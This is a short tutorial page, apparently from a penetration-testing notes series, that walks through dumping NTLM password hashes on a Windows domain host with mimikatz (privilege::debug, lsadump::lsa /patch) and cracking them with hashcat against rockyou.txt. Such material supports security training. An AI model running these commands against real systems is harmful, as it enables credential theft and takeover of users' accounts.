Dumping Hashes with mimikatz

Introduction

Mimikatz is a very popular and powerful post-exploitation tool mainly used for dumping user credentials inside of a active directory network

We'll be focusing on dumping the NTLM hashes with mimikatz and then cracking those hashes using hashcat

Dump Hashes w/ mimikatz

cd Downloads && mimikatz.exe this will cd into the directory that mimikatz is kept as well as run the mimikatz binary
privilege::debug ensure that the output is "Privilege '20' ok" - This ensures that you're running mimikatz as an administrator; if you don't run mimikatz as an administrator, mimikatz will not run properly
lsadump::lsa /patch Dump those hashes!

Crack those hashes w/ hashcat

hashcat -m 1000 <hash> rockyou.txt

PreviousEnumeration with Bloodhound (GUI)NextGolden Ticket Attacks with mimikatz

Last updated 1 year ago